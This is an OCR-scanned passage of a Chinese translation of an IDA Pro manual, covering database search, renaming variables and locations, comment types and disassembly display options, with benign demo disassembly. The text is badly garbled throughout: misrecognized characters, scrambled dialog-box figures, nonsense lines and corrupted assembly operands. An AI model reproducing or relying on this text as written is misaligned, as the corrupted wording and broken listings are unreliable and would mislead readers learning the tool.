果 你 是 一 名 破解 程序 开发 人 员 ， 并 且 知 道 可 以 使 这 个 特殊 的 缓冲 区 溢出 ; 那么 ， 你 应 该 认识 到 ， 
你 至 少 得 提供 76 字 节 ( 就 编译 器 而 言 ， 这 是 缓冲 区 的 有 效 大 小 )， 否 则 你 希望 看 到 的 事 就 不 会 发 
生 。 在 第 8 章 中 ， 我 们 将 再 次 讨论 栈 帧 视图 ， 以 及 它 在 处 理 数组 和 结构 体 等 更 加 复杂 的 数据 类 型 
时 的 用 法 。 
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6.3 ”搜索 数据 库 


在 IDA 中 ， 你 可 以 轻松 导航 到 你 知道 的 位 置 。IDA 设 计 了 许多 类 型 的 数据 显示 来 总 结 特定 类 
型 的 信息 (名 称 、 字 符 串 、 导 入 等 )， 以 方便 你 查找 这 些 信息 。 但 是 ， 哪 些 功 能 可 帮助 你 对 数据 
库 进 行 更 一 般 的 搜索 呢 ?” 如 采 仔 细 查 看 一 下 搜索 末 单 ,你 会 发 现 大 量 选 项 , 它们 绝 大 多 数 都 要 求 
你 选择 某 个 类 别 中 的 下 一 个 选项 。 例 如，Search》 Next Code 命 令 将 光标 移动 到 下 一 个 包含 指令 的 
位 置 。 你 可 能 还 希望 了 解 跳 转 玉 单 中 的 选项 ， 这 其 中 许多 选项 提供 了 大 量 位 置 供 你 选择 。 例 如 ， 
使 用 Jump > Jump to Function 命 令 可 以 打开 所 有 也 数 ,你 可 以 了 迅速 选择 一 个 子 数 并 导航 到 该 函数 所 
在 的 位 置 。 虽 然 这 些 扫描 搜索 功能 通常 非常 有 用 ,但 下 面 这 两 种 通用 搜索 功能 更 值得 详细 讨论 : 
文本 搜索 和 二 进 制 搜索 。 


6.3.1 文本 搜索 


IDA 文 本 搜索 相当 于 对 反 汇 编列 表 和 窗口 进 行 子 字 符 串 搜索 ,通过 Search》 Text( 热 键 : ALT+T ) 
命令 启动 文本 搜索 ， 即 打开 如 图 6-7 所 示 的 对 话 框 。 许 多 直观 的 选项 规定 了 与 搜索 有 关 的 细 市 。 
如 图 所 示 ，IDA 人 允许 你 搜索 POSIX 类 型 的 正则 表达 式 。 这 里 的 标识 符 ( Identifier ) 搜索 有 些 用 词 
不 当 。 实 际 上 ， 它 将 搜索 限制 于 仅 查 找 完整 的 词 ， 并 且 能 够 匹配 反 汇 编 行 中 的 任何 完整 的 词 ， 包 
括 操 作 码 助 记 符 或 常量 。 对 401116 进 行 标 识 符 搜 索 将 无 法 找到 名 为 loc_401116 的 符号 。 






































À Text search [slow!) 2| xl 
sng[ zl 


Direction 
Ce Search Down 


(€ Search Up 





[ Find all occurences 


[oo | cne | 








lei Text Search ( 文本 搜索 ) 对 话 框 


选择 Find all occurences ( 查找 所 有 结果 ), IDA 将 在 一 个 新 的 窗口 中 显示 搜索 结果 ,你 可 以 根 
据 搜 索 条 件 轻 松 导 航 到 任何 一 个 匹配 结果 。 最 后 ,使 用 CTRL + TzkSearch » Next Text ( 搜索 » F 





一 个 文本 ) 命令 可 重复 前 一 项 搜索 ， 以 找到 下 一 个 匹配 结 


6.3.2 二进制 搜索 


如 采 需 要 搜索 特定 的 二 进 制 内 容 ， 如 已 知 的 字 节 序列 ， 这 时 就 不 能 使 用 文本 搜索 功能 ， 而 应 
使 用 IDA 的 二 进 制 搜索 工具 。 文 本 搜索 针对 反 汇 编 窗 口 进行 搜索 ,但 是 ， 你 可 以 认为 二 进 制 搜索 
仅 搜 索 十 六 进 制 视图 窗口 。 根 据 你 指定 搜索 字符 串 的 方式 , 你 可 以 搜索 十 六 进 制 或 ASCI 字 符 串 。 
使 用 Search >» Sequence of Bytes ( 搜索 » 字 节 序列 ) 或 ALT+B 即 可 启动 二 进 制 搜索 。Binary Search 
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( 二进制 搜索 ) 对 话 框 如 图 6-8 所 示 。 要 搜索 一 个 十 六 进 制 字 节 序 列 ， 应 将 搜索 字符 串 指 定 为 以 空 
格 分 隔 的 两 位 十 六 进 制 值 组 成 的 列表 ， 如 CA FE BA BE， 这 与 搜索 ca fe ba be 的 结果 相同 ， 无 论 
你 是 否 选 中 Case-sensitive ( 区 分 大 小 写 ) 选项 都 是 如 此 。 

2| xl 


Enter binary search string: 


string | m | 


Ce Search Down (* Hex 
f Search Up C Decimal 












(C Octal 
m Case-sensitive 
[ Unicode strings 
[ Find all occurrences 


图 6-8 Binary Search 对 话 框 
要 搜索 内 骨 的 字符 串 数 据 ( 有 歼 搜索 十 六 进 制 窗口 中 的 ASCI 字 符 串 ) 你 必须 将 搜索 字符 串 
用 引号 括 起 来 。 使 用 Unicode Strings 选 项 可 以 搜索 你 所 搜索 的 字符 串 的 Unicode 版 本 。 
Case-sensitive 选 项 可 能 会 引起 混淆。 在 搜索 字符 串 时 ， 它 的 作用 相当 简单 。 如 果 没 有 选中 
Case-sensitive 选 项 ， 则 搜索 hello 时 会 出 现 HELLO。 但 是 ,在 进行 十 六 进 制 搜索 时 ， 如 果 没 有 选中 





Case-sensitive 选 项 ， 情 况 会 有 所 不 同 。 如 果 对 E9 41 C3 进行 不 区 分 大 小 写 的 搜索 ， 你 会 惊奇 地 发 
现 ，E9 61 C3 出 现在 了 搜索 结果 中 。 这 是 因为 ，0x41 对 应 于 字符 A， 而 0x61 则 对 应 于 字符 8a， 所 以 
IDA 认 为 这 两 个 字符 串 相 互 匹配 。 所 以 , 即使 你 指定 了 进行 十 六 进 制 搜索 , 但 0x41 却 等 同 于 0x61， 
为 你 并 没有 指定 进行 区 分 大 小 写 的 搜索 。 











WB D0000000000000000000000000000000 CasesensitiveD (] [] 
IDUIUDUDUUDUDUIUDUDASCHIUDUIUDUDUIUDUU 


使 用 CTRL + B 或 Search 》 Next Sequence of Bytes( 搜索 》 下 一 个 字 市 序列 ) 可 以 搜索 随后 的 二 
进 制 数据 。 最 后 ， 你 并 没有 必要 在 十 六 进 制 视图 窗口 中 进行 二 进 制 搜索 。IDA 人 允许 你 在 活动 的 反 汇 
编 窗 口中 指定 二 进 制 搜索 条 件 , 如 果 你 成 功 找到 与 搜索 条 件 相 匹配 的 字符 串 , 反 汇 编 窗口 将 跳 转 对 
相应 的 位 置 。 


6.4 hz 


本 章 介 绍 了 帮助 你 高 效 浏 览 反 汇编 代码 的 最 基本 的 技巧 。 到 目前 为 止 ， 我 们 已 经 讨论 了 与 
IDA 进 行 交 互 所 涉及 的 绝 大 多 数 操作 。 了 解 如 何 导 航 后 , 下 一 步 我 们 将 学 习 如 何 修改 IDA 数 据 库 ， 
以 满足 用 户 的 特殊 要 求 。 在 下 一 章 中 ,我们 将 学 习 如 何 对 反 汇 编 代 码 进行 最 基本 的 修改 ,从 而 在 
了 解 二 进 制 文件 内 容 和 行为 的 基础 上 学 握 新 的 知识 。 























有 反 汇 编 探 作 








ak IDA 提 贷 的 妃 一 项 重要 功能 是 让 你 根据 需要 修改 反 汇 编 代 码 。 由 于 IDA 基 础 
一 一 效 据 库 的 本 质 ， 你 对 反 汇 编 代 码 所 做 的 更 改 将 迅速 "DC SIIDABSPUR T $8 D UB, 
以 使 反 汇 编 代 码 保持 一 致 ， 而 这 正 是 本 章 要 加 读者 展示 的 内 容 。IDA 提 供 的 一 项 最 强大 的 功能 能 
够 帮助 你 轻松 操作 反 汇 编 代码 ,在 其 中 添加 新 的 信息 ,或 重新 格式 化 一 个 代码 清单 ， 以 满足 你 的 
特殊 要 求 。 在 必要 时 ，IDA 能 够 目 动 处 理 各 种 操作 ， 如 全 局 搜索 和 答 换 ， 并 可 轻 多 对 指令 和 数据 
重新 格式 化 (或 将 格式 化 后 的 指令 和 数据 还 原 )， 这 些 都 是 其 他 反 汇 编 工 具 所 不 具备 的 功能 。 











说 明 DOD0mDA0000000000000000000000000000000000 
(DUDUDUDDUDUUDUOUIUDUDDUIDUI 


7.1 名 称 与 命名 


到 现在 为 止 ， 我 们 已 经 在 IDA 反 汇编 窗口 中 遇 到 了 两 类 名 称 : 与 虚拟 地 址 (已 命名 的 位 置 ) 
有 天 的 名 称 和 与 栈 帧 变量 有 关 的 名 称 。 在 绝 大 多 数 悄 况 下 ，IDA 会 根据 前 面 讨论 的 指导 原则 ,日 
动 生成 所 有 这 些 名 称 。IDA 把 这 些 目 动 生成 的 名 称 叫做 哑 名 。 

遗憾 的 是 , 这 些 名 称 很 少 能 够 帮助 我 们 了 解 一 个 位 置 或 变量 的 用 途 , 因此 也 无 法 帮助 我 们 了 
解 程序 的 行为 。 在 分 析 一 个 程序 时 ,操作 反 汇 编 代 码 清 单 的 最 主要 和 最 种 使 用 的 一 个 方法 ,是 将 
默认 名 称 更 改 为 更 有 意义 的 名 称 。 好 在 IDA 人 允许 你 随意 修改 任何 名 称 ， 并 人 处理 在 整个 反 汇编 代码 
清单 中 扩散 名 称 变更 的 所 有 细 方 。 多数 情况 下 , 要 修改 一 个 名 称 , 只 需 单 击 你 希望 修改 的 名 称 (使 
其 突出 显示 )， 并 使 用 热 键 N 打 开 更 名 对 话 框 。 另 外 ， 碳 击 需要 修改 的 名 称 ， 并 在 出 现 的 上 下 文 
菜单 中 选择 Rename 选 项 (如 图 6-5 所 示 )， 也 可 以 更 改名 称 。 栈 变量 和 已 命名 的 位 置 的 更 名 过 程 稍 
有 不 同 ， 我 们 将 在 后 续 几 中 详细 说 明 这 些 差异 。 


7.1.1 参数 和 局 部 变量 


与 栈 变 量 有 关 的 名 称 是 反 汇 编 代 人 码 清单 中 最 简单 的 名 称 , 这 主要 是 因为 它们 与 特定 的 虚拟 地 
址 无 天 ， 因而 从 未 出 现在 名 称 窗口 中 。 和 在 许多 编程 语言 中 一 样 ， 根据 给 定 栈 巾 所 属 的 函数 ， 这 
类 和 名称 的 作用 域 会 受到 限制 。 因 此 ， 程 序 中 的 每 个 明 数 可 能 都 有 一 个 名 为 arg_0 的 栈 变 量 ， 但 没 
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有 一 个 函数 拥有 一 个 以 上 的 arg 0 变量 。 图 7-1 所 示 的 对 话 框 用 于 重 命名 栈 变 量 。 
A Please entera sting O O OO 2x] 
Enter stack variable name [var 5c gl 





图 7-1 重 命名 栈 变 量 
提供 一 个 新 名 称 后 ，IDA 会 对 当前 函数 上 下 文中 的 每 一 个 旧名 称 进行 修改 。 在 demo_ 





stackframe 中 ,将 var 5C 更 名 为 y， 将 得 到 如 下 所 示 的 新 代码 清单 ，O@ 处 的 名 称 已 发 生变 化 。 
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00401090 ; =========== S U B R OU T I N E ========================= 
00401090 

00401090 ; Attributes: bp-based frame 

00401090 

00401090 demo stackframe proc near ` CODE XREF: sub 4010C1+41Vp 
00401090 

00401090 var 60 - dword ptr -60h 

00401090 @y - dword ptr -5Ch 

00401090 var 58 - byte ptr -58h 

00401090 var C - dword ptr -OCh 

00401090 arg 4 = dword ptr oCh 

00401090 arg 8 - dword ptr 10h 

00401090 

00401090 push ebp 

00401091 mov ebp, esp 

00401093 sub esp, 112 

00401096 mov eax, [ebp«arg 8] 
00401099 mov [ebpsvar C], eax 
0040109C mov eax, [ebp«arg 4] 
0040109F mov [ebpry], eax 
004010A2 mov [ebp+var 60], oAh 
004010A9 mov [ebp+var 58], 41h 
004010AD mov eax, [ebp+@y| 
004010BO mov [esp+4], eax 
004010B4 mov eax, [ebp+var_60] 
004010B7 mov [esp], eax 
004010BA call bar 

004010BF leave 

004010CO retn 

004010CO demo stackframe endp 








AUR got DNK SI RT RE DU EC pr, 打开 更 名 对 话 框 , 在 输入 框 中 输入 一 个 空 晶 名称 , IDA. 
将 为 你 生成 默认 的 名 称 。 


7.12 已 命名 的 位 置 








重 命名 一 个 已 命名 的 位 置 或 给 一 个 未 命名 的 位 置 取 名 , 这 个 过 程 与 修改 栈 变 量 的 名 称 略 有 不 
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同 。 打 开 更 名 对 话 框 的 方法 〈 利 用 热 键 N ) 完全 相同 ， 但 随后 的 操作 则 明显 不 同 。 与 已 命名 的 位 
置 有 关 的 更 名 对 话 框 如 图 7-2 所 示 。 


Address: 0x401090 
Name [demo stadkframe zl 


Maximum length of new names [is | 











图 7-2 Sp T DE 


该 对 话 框 显示 你 命名 的 具体 地 址 ， 以 及 一 些 与 该 名 称 有 关 的 特性 。 最 大 名 称 长 度 对 应 于 IDA 
的 一 个 配置 文件 (<IDADIR>/cfg/ida.cfg ) 中 的 某 个 值 。 你 可 以 使 用 任何 超出 这 个 长 度 的 名 称 ， 
这 时 ，IDA 会 显示 警告 消息 ， 提 醒 你 已 经 超出 了 最 大 名 称 长 度 ， 并 要 求 为 你 增加 最 大 名 称 长 度 设 
置 。 如 果 你 选择 这 样 做 ，IDA 将 仅 在 当前 数据 库 中 采用 新 设置 的 最 大 名 称 长 度 值 ， 而 你 创建 的 任 
何 新 数据 库 仍 将 继续 采用 配置 文件 中 指定 的 最 大 名 称 长 度 。 
下 面 的 特性 可 能 与 某 个 已 命名 的 位 置 有 关 。 
O Local names (局 部 名 称 )。 局 部 名 称 的 作用 域 仅 限于 当前 函数 ， 因 此 ， 局 部 名 称 的 唯一 
性 仅 在 某 个 给 定 的 函数 中 有 效 。 与 局 部 变量 一 样 ， 两 个 不 同 的 因数 可 能 含有 完全 相同 的 
局 部 名 称 ， 但 一 个 函数 不 可 能 包含 两 个 完全 相同 的 局 部 名 称 。 在 晒 数 边界 以 外 的 已 命名 
的 位 置 不 能 被 指定 为 局 部 名 称 ， 这 包括 表示 函数 及 全 局 变量 的 名 称 。 局 部 名 称 最 常用 于 
为 函数 中 的 跳 转 目 标 提 供 符 号 名 称 ， 如 那些 与 分 支 控制 结构 有 关 的 名 称 。 
O Include in names list 〈 包 含 在 名 称 列表 中 )。 选 择 这 个 选项 将 有 一 个 名 称 和 被 添加 到 名 称 窗 
口中 ， 这 样 ， 当 你 需要 返回 该 名 称 所 在 位 置 时 ， 就 更 容易 找到 这 个 名 称 。 默 认 情 况 下 ， 
目 动 生成 的 名 称 〈 哑 名 ) 不 包含 在 名 称 窗口 中 。 
O Public name (公共 名 称 )。 通 常 ， 公 共 名 称 是 指 由 二 进 制 文件 ( 如 共 至 库 ) 输出 的 名 称 。 
在 最 初 加 载 数据 库 的 过 程 中 , IDA 的 解析 需 会 在 解析 文件 头 的 同时 查找 公共 名 称 。 选 择 这 
个 特性 , 你 可 以 强制 IDA 将 一 个 符号 看 成 是 公共 名 称 。 一 般 来 说 ， 这样 做 除了 给 反 汇 编 代 
人 码 清单 和 名 称 窗 口中 的 名 称 添加 公共 注释 外 ， 不 会 对 反 汇 编 代码 造成 任何 影响 。 
口 Autogenerated name (自动 生成 的 名 称 )。 这 个 特性 似乎 不 会 对 反 汇 编 代码 产生 任何 明显 
的 影响 。 选 择 它 并 不 会 使 IDA 自 动 生成 一 个 名 称 。 
口 Weak name (384480. 5887] (weak symbol) 是 公共 符号 的 一 种 特殊 形式 ， 只 有 没有 
找到 相同 名 称 的 公共 符号 来 重 写 时 ， 才 会 使 用 弱 符 号 。 将 一 个 符号 标记 为 弱 符 号 对 汇编 
天 有 一 定 意 义 ， 但 对 IDA 反 汇编 代码 却 没有 任何 意义 。 
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O Create name anyway (无 论 如 何 都 要 创建 名 称 )。 如 前 所 述 ， 一 个 函数 中 不 会 有 两 个 位 
置 使 用 相同 的 名 称 。 同 样 ， 在 函数 以 外 (全 局 范围 内 )， 也 不 能 有 两 个 位 置 使 用 相同 的 名 
称 。 这 个 选项 比较 容易 引起 混淆 ， 因 为 你 创建 的 名 称 的 类 型 不 同 ， 它 的 行为 也 不 一 样 。 
如 采 你 正在 全 局 范围 内 编辑 一 个 名 称 ( 如 函数 名 称 或 全 局 变量 ), 并 且 和 尝试 分 配 一 个 数据 库 中 
已 经 存在 的 名 称 ， 这 时 ，IDA 将 会 显示 名 称 冲突 对 话 框 ， 如 图 7-3 所 示 。 同 时 ，IDA 会 自动 生成 一 
个 唯一 的 数字 后 级 , 以 解决 冲突 。 无论 你 是 否 选 择 Create name anyway 选 项 , 这 个 对 话 框 都 会 出 现 。 
但 是 , 如 采 你 正 编 辑 某 个 消 数 中 的 一 个 局 部 名 称 , 并 且 莹 试 分 配 一 个 已 经 存在 的 名 称 , 这 时 ， 
默认 情况 下 ，IDA 会 拒绝 这 种 尝试 。 如 果 你 决心 要 使 用 这 个 名 称 ， 必 须 选 择 Create name anyway 
选项 ， 以 强制 IDA 为 局 部 名 称 生成 一 个 唯一 的 数字 后 组 。 当 前 ， 解 决 名 称 冲 突 的 最 简单 方法 ， 是 
选择 一 个 从 未 使 用 的 名 称 。 

















DE Aa 


dw The name bar is already present in the database 





WE ` Do you want add a numerical suffix to it like name 07? 


e lz 


厂 Don't display this message again 





图 7-3 ”名 称 冲 突 对 话 框 


7.1.3 寄存 器 名 称 


第 三 类 常 被 忽略 的 名 称 为 寄存 带 名 称 。 在 限 数 边界 内 ，IDA 人 允许 对 寄存 右 进 行 重 命名 。 如 果 
编译 天 选择 将 变量 分 配 到 寄存 融 中 ,而 不 是 程序 栈 上 , 并 且 你 希望 使 用 一 个 比 EDX 更 恰当 的 名 称 
来 引用 这 个 变量 , 这 时 重 命名 寄存 右 才 有 用 处 。 重 命名 寄存 天 与 重 命 名 其 他 位 置 的 方法 几乎 完全 
相同 。 使 用 热 键 N， 或 右 击 寄存 器 名 称 并 在 出 现 的 荣 单 中 选择 Rename， 打 开 “ 寄 存 器 重 命名 ”对 
话 框 。 重 命名 寄存 需 时 ， 你 实际 上 是 提供 了 一 个 别名 ,并 使 用 它 在 当前 函数 执行 期 间 引 用 该 寄存 
器 (IDA 甚 至 在 函数 开始 部 分 用 alias=register 语 法 来 表示 这 个 别名 )。 然 后 ，IDA 会 用 你 提供 的 
别名 替代 该 寄存 融 的 名 称 。 如 果 一 段 代 码 不 属于 某 个 因数 , 那么 , 重 命名 这 段 代 码 中 的 寄存 融 是 
不 可 能 的 。 
































7.2 IDA 中 的 注释 


IDA 的 为 一 项 有 用 功能 是 它 能 够 在 数据 库 中 其 入 注释 。 在 分 析 程 序 时 ,添加 注释 特别 有 用 ， 
因为 它 可 帮助 你 随时 掌握 分 析 进 程 。 具体 来 说 , 注释 有 助 于 以 一 种 更 高 级 的 方式 描述 汇编 语言 指 
令 序 列 。 例 如 ， 你 可 以 选择 使 用 C 语 言语 句 深 加 注释 ， 以 总 结 菏 个 特殊 函数 的 行为 。 在 随后 的 也 
数 分 析 过 程 中 ， 这 些 注释 有 助 于 你 迅速 回忆 起 该 函数 的 作用 ， 而 不 知 要 重新 分 析 汇 编 语 言语 人 句 。 

IDA 提 供 了 几 种 不 同类 型 的 注释 ,每 种 注释 适用 于 不 同 的 目的 。 使 用 Edit > Comments 命 令 提 
供 的 选项 ,可 以 为 反 汇 编 代码 清单 中 的 任何 一 行 代码 添加 注释 。 通 过 热 键 或 上 下 文 亲 单 ， 同 样 可 
以 使 用 IDA 的 注释 功能 。 为 帮助 你 理解 IDA 的 注释 功能 ， 我 们 下 面 以 函数 bar 的 反 汇 编 代 码 为 例 : 









































.text 


:00401050 
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.text:00401050 @; void bar(int j, int k); 


„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 
„text: 


绝 大 多 数 IDA 注 释 以 分 号 为 前 级 ， 





00401050 ; Attributes: bp-based frame 

00401050 

00401050 @bar proc near ; CODE XREF: demo stackframe+2A,p 
00401050 

00401050 arg O - dword ptr 8 

00401050 arg 4 = dword ptr oCh 

00401050 

00401050 push  ebp 

00401051 mov  ebp, esp 

00401053 sub esp, 8 

00401056 The next three lines test j < k 

00401056 mov eax, [ebp«arg ol 

00401059 cmp eax, [ebp+targ 4] 

0040105C jge short loc 40106C 9; Repeating comments get echoed at referencing locations 
0040105E mov [esp], offset aTheSecondParam O0; "The second parameter is larger" 
00401065 call printf 

0040106A jmp short locret 40108bE 60; jump to the end of the function 

0040100€ 二 -ae 
0040106C 

0040106C loc 40106C: ; CODE XREF: bar4C.j 

0040106C mov eax, [ebp«arg 0] 0; Repeating comments get echoed at referencing locations 
0040106F cmp eax, [ebptarg 4] 

00401072 jle short loc 401082 

00401074 mov [esp], offset aTheFirstParame 0; "The first parameter is larger" 
0040107B call printf 

00401080 jmp short locret 40108E 

BEE EE 
00401082 

00401082 loc 401082: ; CODE XREF: bar+22.] 

00401082 mov [esp], offset aTheParametersA 0; "the parameters are equal" 

00401089 call printf 

0040108E 

0040108bE locret 40108E: ; CODE XREF: barz1A-j 

0040108E ; bar*30-j 

0040108bE leave 

0040108F retn 

0040108F bar endp 





AX —1 15) VRAT UERE, XC SYFAEIL AI an B 


注释 方法 类 似 ， 并 等 同 于 许多 脚本 霹 言 中 的 # 式 注释 和 C++ 中 的 / 式 注 释 。 


1.2.1 


吊 规 注释 








最 简单 直接 的 注释 为 常规 注释 。 和 常规 注释 位 于 现 有 汇编 代码 行 的 尾部 ， 如 前 面 代码 中 @ 处 的 
注释 。 右 击 反 汇编 窗口 右边 缘 ， 或 者 使 用 冒号 (: ) 热 键 ， 可 打开 “输入 注释 ”对 话 框 ， 右 在 其 
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中 输入 了 多 行 注释 ,常规 注释 将 跨越 多 行 。 每 一 行 注释 将 排 到 反 沪 编 窗 口 的 右 侧 ,并 同样 以 分 号 
FK, 且 与 最 第 一 个 分 号 对 齐 。 要 编辑 或 删除 一 段 注 释 ， 必须 重 新 打开 “输入 注释 ”对 话 杠 ,在 
必要 时 对 其 中 的 注释 进行 编辑 或 删除 。 软 认 情 况 下 ， 和 轴 规 注释 以 蓝 色 显 示 。 

IDA 本 身 就 大 量 使 用 常规 注释 。 在 分 析 阶 段 ，IDA 插 和 人 常规 注释 说 明 为 调用 函数 而 压 人 的 参 
数 。 只 有 当 IDA 拥 有 被 调用 函数 的 参数 名 称 或 类 型 信息 时 ， 它 才 会 使 用 稼 规 注释 。 通 遂 ， 这 些 信 
县 包含 在 类 型 库 中 (这 些 内 容 将 在 第 8 草 和 第 13 章 讨论 )， 也 可 以 手动 输入 。 


7.2.2 ”可 重复 注释 


可 重复 注释 一 旦 输入 ,将 会 自动 出 现在 反 汇 编 窗口 中 的 许多 位 置 。 在 前 面 的 代码 段 中 ，@ 处 
的 注释 即 为 可 重复 注释 。 在 反 汇 编 代码 清单 中 , 可 重复 注释 的 颜色 默认 为 赣 色 ,这 使 得 我 们 很 难 
将 它们 与 常规 注释 区 分 开 来 。 在 这 种 情况 下 , 行为 比 外 观 更 加 重要 。 可 重复 注释 的 行为 与 交叉 引 
用 的 概念 有 关 。 如 采 一 个 程序 位 置 引 用 了 另 一 个 包含 可 重复 注释 的 位 置 , 则 该 注释 会 在 第 一 个 位 
置 回 显 。 默 认 情 况 下 ， 回 显 的 注释 以 灰色 文本 显示 ， 从 而 将 这 些 注释 与 其 他 注释 区 分 开 来 。 可 重 
复 注 释 的 热 键 为 分 号 (; )， 因 此 ， 可 重复 注释 与 常规 注释 非常 容易 引起 混 消 。 

在 前 面 的 代码 中 ， 我 们 注意 到 ，@ 处 的 注释 与 @ 人 处 的 注释 完全 相同 。@ 处 的 注释 被 重复 ， 
为 目 处 的 指令 ( jge short loc 40106C ) 引用 了 @ 处 的 地 址 ( 0040106C )。 

如 宁 在 一 个 显示 可 重复 注释 的 位 置 永 加 一 段 党 规 注 释 , 则 可 重复 注释 将 被 常规 注释 禾 盖 ,该 
位 置 将 仅 显 示 稼 规 注 释 。 如 果 在 卓 处 输入 一 段 党 规 注释 ,那么 ， 从 四 处 继承 得 来 的 可 重复 注释 将 
不 再 在 @@ 处 显示 。 如 有 果 你 删除 @ 处 的 常规 注释 ， 可 重复 注释 将 青 次 显示 。 

可 重复 注释 的 一 种 变 体 与 字符 串 有 关 。 任 何 时 候 ， 如 果 IDA 自 动 创建 一 个 字符 串 变 量 ,， 字符 
串 变量 所 在 的 位 置 都 将 添加 一 段 虚 拟 的 可 重复 注释 。 我 们 称 之 为 虚拟 注释 ,因为 用 户 无 法 编辑 这 
段 注释 。 虚 拟 注 释 的 内 容 被 设置 为 字符 串 变 量 的 内 容 , 并 且 会 在 整个 数据 库 中 显示 ,就 像 是 一 段 
可 重复 注释 一 样 。 因 此 , 任何 引用 字符 串 变 量 的 位 置 都 将 以 重复 注释 的 形式 显示 字符 串 变 量 的 内 
容 。 标 注 为 @ 的 3 有 段 注释 证 明 ， 这 类 注释 是 因为 引用 了 字符 串 变 量 才 显 示 的 。 


7.2.3 EADEM EREE 


在 前 注释 和 在 后 注释 是 出 现在 指定 的 反 汇 编 行 之 前 或 之 后 的 全 行 注 释 ， 它们 是 IDA 中 仪 有 的 
不 以 分 写 为 前 级 的 注释 。 在 上面 的 代码 段 中 ，@ 处 的 注释 即 为 一 段 “在 前 注释 ”。 通 过 将 与 某 个 
行 相关 的 地 址 与 该 行 之 后 或 之 前 的 指令 进行 比较 ， 即 可 区 分 “在 前 ”注释 与 “在 后 ”注释 。 






















































































7.2.4 E GERE 


通过 函数 注释 ,你 可 以 为 水 数 的 反 汇 编 代码 清单 项 部 显示 的 注释 分 组 。 前面 代 人 码 段 中 @ 人 处 显 
示 的 注释 即 为 孙 数 注释 ， 其 中 也 包含 函数 原型 。 要 输入 函数 注释 ， 首先 应 突出 显示 限 数 顶部 的 也 
数 名 称 ( @ )， 然 后 再 输入 一 段 兽 规 注释 或 可 重复 注释 。 可 重复 水 数 注释 将 在 调用 该 函数 的 任何 
位 置 回 显 。 当 使 用 第 8 章 将 介绍 的 Set Function Type 命 令 时 ，IDA 将 自动 生成 函数 原型 式 注释 。 
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7.3 基本 代码 转换 


许多 时 候 ， 对 于 IDA 生 成 的 反 汇 编 代 码 清单 ， 你 会 感到 非常 满意 。 但 情况 并 非 始 终 如 此 。 如 
果 你 所 分 析 的 文件 类 型 与 常见 编译 器 生成 的 普通 二 进 制 可 执行 文件 相差 甚大 , 你 可 能 需要 对 反 汇 
编 分 析 和 显示 过 程 进行 更 多 的 控制 。 在 分 析 采 用 上 自 定 义 文件 格式 ( IDA 无 法 识别 ) 的 模糊 代码 或 
文件 时 ,情况 更 是 如 此 。 

IDA 提 供 的 代码 转换 包括 以 下 几 类 : 

a 将 数据 转换 为 代码 ; 

口 将 代码 转换 为 数据 ; 

a 指定 一 个 指令 序列 为 困 数 ; 

Q 更 改 现 有 了 国 数 的 起 始 或 结束 地 址 ; 

D 更 改 指令 操作 数 的 显示 格式 。 

利用 这 些 操作 的 频繁 程度 取决 于 诸多 因素 及 你 的 个 人 喜好 。 一 般 而 言 ， 如 果 二 进 制 文件 非常 
复杂 ， 或 者 说 IDA 不 熟悉 用 于 构建 二 进 制 文件 的 编译 句 所 生成 的 代码 序列 ， 那 么 ，IDA 在 分 析 阶 
段 可 能 会 遇 到 更 多 麻烦 ， 因 此 ， 你 也 就 需要 对 反 汇 编 代 码 进 行 手动 调整 。 





7.3.1 代码 显示 选项 


你 能 够 对 反 汇 编 代 但 清单 所 做 的 最 简单 的 转换 是 ， 目 定义 IDA 为 每 个 反 汇 编 行 生成 的 信息 数 
量 。 每 一 个 反 汇 编 行 都 可 视 为 一 个 由 许多 部 分 组 成 的 集合 ， 宣 不 奇怪 ，IDA 就 称 之 为 反 汇 编 行 部 
分 。 标 签 、 助 记 符 和 操作 数 始终 会 在 反 汇 编 行 中 显示 。 你 也 可 以 通过 Options ”General 命 令 打 开 
"IDA Options” 对 话 框 ， 并 选择 “Disassembly” 选 项 卡 ， 为 每 一 个 反 汇 编 行 选择 其 他 需要 显示 的 
部 分 ( 如 图 7-4 所 示 ). 


Disassembly | Analysis | Cross-references | Strings | Browser | Graph | Misc | 


Address representation Display disassembly line parts 
[ Function offsets [v Line prefixes 

[v Indude segment addresses [ Stack pointer 

[v Use segment names [v Comments 


[v Repeatable comments 
Display disassembly lines GE 























[ Auto comments 
[ Badinstruction «BAD» marks 
Number of opcode bytes 


[v Empty lines 
[ Borders between data/code 


[ Basic block boundaries 
[v Source line numbers 


Instructions indention | 16 
Line prefix example: seg000:0FE4 Comments indention | 40 
Low suspiciousness limit | 0x401000 Right margin | 70 
High suspiciousness limit [0x404200 Spaces for tabulation | 8 








图 7-4 反 汇 编 行 显示 选项 
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右上 角 的 Display disassembly line parts ( 显示 反 汇 编 行 部 分 ) 区 域 提 供 了 几 个 选项 ， 可 帮助 
你 对 反 汇 编 行 进行 日 定义 。IDA 反 汇编 文本 视图 会 默认 选择 行 前 级、 注释 和 可 重复 注释 。 下 面 说 
明 其 中 的 每 一 个 选项 。 

口 Line prefixes( 行 前 级)。 行 前 级 是 每 个 反 汇 编 行 的 section:address 部 分 。 不 选 这 个 选项 ， 
每 个 反 汇编 行将 不 会 显示 行 前 级 ( 图 形 视图 的 默认 设置 )。 为 说 明 这 个 选项 ， 我 们 在 后 面 
的 反 汇 编 代 码 中 禁用 了 行 前 级 。 

O Stack Pointer 〈 栈 指针 )。IDA 会 详细 分 析 每 一 个 函数 ， 以 跟踪 程序 栈 指 针 的 变化 。 这 种 
分 析 对 于 理解 每 个 图 数 的 栈 帧 的 布局 非常 重要 。 选 中 栈 指 针 选 项 ,IDA 将 会 显示 栈 指针 在 
每 个 函数 执行 过 程 中 的 相对 变化 。 这 样 做 有 助 于 识别 调用 约定 方面 的 差异 ( 例如，IDA 可 
能 不 知道 某 个 特殊 的 函数 使 用 的 是 stdcall 调 用 约定 )， 或 者 确定 对 栈 指 针 的 不 寻常 操纵 。 
栈 指针 跟踪 如 代码 段 中 @ 下 面 一 列 所 示 。 在 这 个 例子 中 , 在 第 一 条 指令 之 后 , 栈 指针 改变 
了 4 字 节 ; 在 第 三 条 指令 之 后 ， 总 共 改 变 了 0x7C 字 节 。 在 函数 退出 时 ， 栈 指针 恢复 到 它 的 
